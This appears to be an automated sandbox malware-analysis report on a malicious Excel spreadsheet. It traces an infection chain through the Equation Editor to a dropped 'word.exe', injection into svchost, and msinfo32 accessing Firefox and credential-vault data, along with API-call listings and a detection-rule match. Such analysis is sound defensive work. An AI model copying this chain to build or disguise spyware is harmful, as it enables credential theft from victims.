Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00434D50: GetFullPathNameW,__swprintf,_wcslen,_wcslen,_wcslen,CreateDirectoryW,CreateFileW,_memset,_wcslen,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,5_2_00434D50
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_004461ED _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,5_2_004461ED
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_004364AA GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,5_2_004364AA
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00409A405_2_00409A40
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_004120385_2_00412038
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0047E1FA5_2_0047E1FA
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0041A46B5_2_0041A46B
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0041240C5_2_0041240C
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_004465665_2_00446566
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_004045E05_2_004045E0
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_004128185_2_00412818
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0047CBF05_2_0047CBF0
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00412C385_2_00412C38
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00490D705_2_00490D70
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00424F705_2_00424F70
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0041AF0D5_2_0041AF0D
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_004271615_2_00427161
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_004212BE5_2_004212BE
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_004433905_2_00443390
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_004433915_2_00443391
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0041D7505_2_0041D750
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_004037E05_2_004037E0
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_004278595_2_00427859
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0040F8905_2_0040F890
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0042397B5_2_0042397B
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00411B635_2_00411B63
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00423EBF5_2_00423EBF
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_03A467985_2_03A46798
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_004185E36_2_004185E3
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_004168236_2_00416823
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_004030906_2_00403090
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_004100936_2_00410093
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0040E1136_2_0040E113
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_004011F06_2_004011F0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_004023906_2_00402390
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00402BAE6_2_00402BAE
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0042EC636_2_0042EC63
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0040FE6A6_2_0040FE6A
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0040FE736_2_0040FE73
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_004026F06_2_004026F0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0088E0C66_2_0088E0C6
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0088E2E96_2_0088E2E9
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_009363BF6_2_009363BF
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_008B63DB6_2_008B63DB
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_008923056_2_00892305
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_008DA37B6_2_008DA37B
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0091443E6_2_0091443E
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_009105E36_2_009105E3
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_008AC5F06_2_008AC5F0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_008D65406_2_008D6540
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_008946806_2_00894680
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0089E6C16_2_0089E6C1
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_009326226_2_00932622
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_008DA6346_2_008DA634
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0089C7BC6_2_0089C7BC
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0089C85C6_2_0089C85C
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_008B286D6_2_008B286D
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0093098E6_2_0093098E
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_008929B26_2_008929B2
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_009249F56_2_009249F5
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_008A69FE6_2_008A69FE
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_008DC9206_2_008DC920
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0093CBA46_2_0093CBA4
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00916BCB6_2_00916BCB
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00932C9C6_2_00932C9C
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0091AC5E6_2_0091AC5E
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_008C0D3B6_2_008C0D3B
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0089CD5B6_2_0089CD5B
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_008C2E2F6_2_008C2E2F
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_008AEE4C6_2_008AEE4C
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0092CFB16_2_0092CFB1
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00902FDC6_2_00902FDC
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_008A0F3F6_2_008A0F3F
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_008BD0056_2_008BD005
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_008930406_2_00893040
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_008A905A6_2_008A905A
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0090D06D6_2_0090D06D
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0091D13F6_2_0091D13F
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_009312386_2_00931238
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0088F3CF6_2_0088F3CF
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_008973536_2_00897353
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_008A14896_2_008A1489
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_008C54856_2_008C5485
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_008CD47D6_2_008CD47D
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_009335DA6_2_009335DA
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0089351F6_2_0089351F
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0091579A6_2_0091579A
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_008C57C36_2_008C57C3
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0092771D6_2_0092771D
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0090F8C46_2_0090F8C4
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0092F8EE6_2_0092F8EE
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_009159556_2_00915955
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0091394B6_2_0091394B
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00943A836_2_00943A83
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0091DBDA6_2_0091DBDA
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0088FBD76_2_0088FBD7
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_008B7B006_2_008B7B00
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0092FDDD6_2_0092FDDD
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0091BF146_2_0091BF14
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_008BDF7C6_2_008BDF7C
Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 8_2_61EAB6F38_2_61EAB6F3
Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 8_2_61E941FB8_2_61E941FB
Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 8_2_61E1519A8_2_61E1519A
Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 8_2_61E530C08_2_61E530C0
Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 8_2_61E213FB8_2_61E213FB
Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 8_2_61E883258_2_61E88325
Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 8_2_61E4B5598_2_61E4B559
Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 8_2_61E8B53E8_2_61E8B53E
Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 8_2_61E1853F8_2_61E1853F
Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 8_2_61E874E58_2_61E874E5
Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 8_2_61E107218_2_61E10721
Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 8_2_61E556B78_2_61E556B7
Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 8_2_61E3782E8_2_61E3782E
Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 8_2_61E4CBB18_2_61E4CBB1
Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 8_2_61E52B5D8_2_61E52B5D
Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 8_2_61E31CF88_2_61E31CF8
Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 8_2_61E1EC498_2_61E1EC49
Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 8_2_61E1DC2C8_2_61E1DC2C
Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 8_2_61E25C1C8_2_61E25C1C
Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 8_2_61E4FEA88_2_61E4FEA8
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\sqlite3.dll A15FD84EE61B54C92BB099DFB78226548F43D550C67FB6ADF4CCE3D064AB1C14
Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 008D3F92 appears 132 times
Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 008D373B appears 253 times
Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 008FF970 appears 84 times
Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0088E2A8 appears 60 times
Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0088DF5C appears 137 times
Source: C:\Users\user\AppData\Roaming\word.exeCode function: String function: 00445975 appears 65 times
Source: C:\Users\user\AppData\Roaming\word.exeCode function: String function: 0041171A appears 37 times
Source: C:\Users\user\AppData\Roaming\word.exeCode function: String function: 0041718C appears 45 times
Source: C:\Users\user\AppData\Roaming\word.exeCode function: String function: 0040E6D0 appears 35 times
Source: sqlite3.dll.8.drStatic PE information: Number of sections : 18 > 10
Source: C:\Windows\SysWOW64\msinfo32.exeRegistry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\52.0.1 (x86 en-US)\Main Install DirectoryJump to behavior
Source: sheet1.xml, type: SAMPLEMatched rule: INDICATOR_XML_LegacyDrawing_AutoLoad_Document author = ditekSHen, description = detects AutoLoad documents using LegacyDrawing
Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winXLSX@10/10@7/6
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0044AF5C GetLastError,FormatMessageW,5_2_0044AF5C
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00464422 OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,5_2_00464422
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_004364AA GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,5_2_004364AA
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0045D517 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode,5_2_0045D517
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0043701F CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,__wcsicoll,CloseHandle,5_2_0043701F
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0047A999 OleInitialize,CLSIDFromProgID,CoCreateInstance,CoInitializeSecurity,_memset,_wcslen,_memset,CoCreateInstanceEx,CoSetProxyBlanket,5_2_0047A999
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0043614F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,5_2_0043614F
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$IND24072113.xlsxJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRA39E.tmpJump to behavior
Source: IND24072113.xlsxOLE indicator, Workbook stream: true
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: msinfo32.exe, 00000008.00000002.640596443.0000000061EB5000.00000002.00000001.01000000.00000008.sdmp, sqlite3.dll.8.drBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: msinfo32.exe, 00000008.00000002.640596443.0000000061EB5000.00000002.00000001.01000000.00000008.sdmp, sqlite3.dll.8.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: msinfo32.exe, 00000008.00000002.640596443.0000000061EB5000.00000002.00000001.01000000.00000008.sdmp, sqlite3.dll.8.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: msinfo32.exe, 00000008.00000002.640596443.0000000061EB5000.00000002.00000001.01000000.00000008.sdmp, sqlite3.dll.8.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: msinfo32.exe, 00000008.00000002.640596443.0000000061EB5000.00000002.00000001.01000000.00000008.sdmp, sqlite3.dll.8.drBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: msinfo32.exe, 00000008.00000002.640596443.0000000061EB5000.00000002.00000001.01000000.00000008.sdmp, sqlite3.dll.8.drBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: msinfo32.exe, 00000008.00000002.640596443.0000000061EB5000.00000002.00000001.01000000.00000008.sdmp, sqlite3.dll.8.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: msinfo32.exe, 00000008.00000002.640596443.0000000061EB5000.00000002.00000001.01000000.00000008.sdmp, sqlite3.dll.8.drBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: msinfo32.exe, 00000008.00000002.640596443.0000000061EB5000.00000002.00000001.01000000.00000008.sdmp, sqlite3.dll.8.drBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: IND24072113.xlsxReversingLabs: Detection: 68%
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\word.exe C:\Users\user\AppData\Roaming\word.exe
Source: C:\Users\user\AppData\Roaming\word.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Users\user\AppData\Roaming\word.exe
Source: C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exeProcess created: C:\Windows\SysWOW64\msinfo32.exe "C:\Windows\SysWOW64\msinfo32.exe"
Source: C:\Windows\SysWOW64\msinfo32.exeProcess created: C:\Program Files (x86)\Mozilla Firefox\firefox.exe "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe"
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\word.exe C:\Users\user\AppData\Roaming\word.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\word.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Users\user\AppData\Roaming\word.exeJump to behavior
Source: C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exeProcess created: C:\Windows\SysWOW64\msinfo32.exe "C:\Windows\SysWOW64\msinfo32.exe"Jump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeProcess created: C:\Program Files (x86)\Mozilla Firefox\firefox.exe "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe"Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: version.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: secur32.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winhttp.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: webio.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: iphlpapi.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winnsi.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dnsapi.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: nlaapi.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rasadhlp.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: credssp.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: ncrypt.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: bcrypt.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\word.exeSection loaded: wow64win.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\word.exeSection loaded: wow64cpu.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\word.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\word.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\word.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\word.exeSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\word.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\word.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wow64win.dllJump to behavior
Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wow64cpu.dllJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: wow64win.dllJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: wow64cpu.dllJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: mfc42u.dllJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: odbc32.dllJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: rpcrtremote.dllJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: mozglue.dllJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: winsqlite3.dllJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: webio.dllJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: wdscore.dllJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: vaultcli.dllJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: winsqlite3.dllJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: winsqlite3.dllJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: cryptui.dllJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: riched32.dllJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: riched20.dllJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: winsqlite3.dllJump to behavior
Source: C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exeSection loaded: version.dllJump to behavior
Source: C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exeSection loaded: rasadhlp.dllJump to behavior
